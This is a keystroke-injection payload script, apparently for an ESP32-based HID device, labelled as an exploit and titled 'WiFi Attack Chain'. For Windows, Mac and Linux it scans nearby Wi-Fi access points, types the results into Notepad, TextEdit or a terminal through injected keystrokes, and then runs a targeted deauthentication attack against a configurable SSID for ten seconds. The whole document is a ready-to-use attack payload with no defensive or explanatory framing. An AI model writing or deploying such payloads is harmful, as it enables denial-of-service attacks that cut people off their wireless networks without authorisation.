NAME WiFi Attack Chain
DESCRIPTION Scan APs, dump results via HID, then deauth target
CATEGORY exploit
PLATFORMS WIN,MAC,LINUX
OPTION TARGET_SSID MyNetwork "Target SSID for deauth"
OPTION DELAY 500 "Initial delay (ms)"
PLATFORM WIN
DELAY {{DELAY}}
IF_CONNECTED
REM Scan nearby WiFi APs via ESP32
WIFI_SCAN
REM Open Notepad and type results
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRINGLN === WiFi Scan Results ===
WIFI_RESULT
STRINGLN === End Results ===
REM Targeted deauth
WIFI_DEAUTH_TARGET {{TARGET_SSID}}
WIFI_WAIT 10000
WIFI_STOP
END_IF
PLATFORM MAC
DELAY {{DELAY}}
IF_CONNECTED
WIFI_SCAN
GUI SPACE
DELAY 700
STRING TextEdit
ENTER
DELAY 1400
STRINGLN === WiFi Scan Results ===
WIFI_RESULT
STRINGLN === End Results ===
WIFI_DEAUTH_TARGET {{TARGET_SSID}}
WIFI_WAIT 10000
WIFI_STOP
END_IF
PLATFORM LINUX
DELAY {{DELAY}}
IF_CONNECTED
WIFI_SCAN
CTRL ALT t
DELAY 1400
STRINGLN cat << 'SCAN'
WIFI_RESULT
STRINGLN SCAN
WIFI_DEAUTH_TARGET {{TARGET_SSID}}
WIFI_WAIT 10000
WIFI_STOP
END_IF
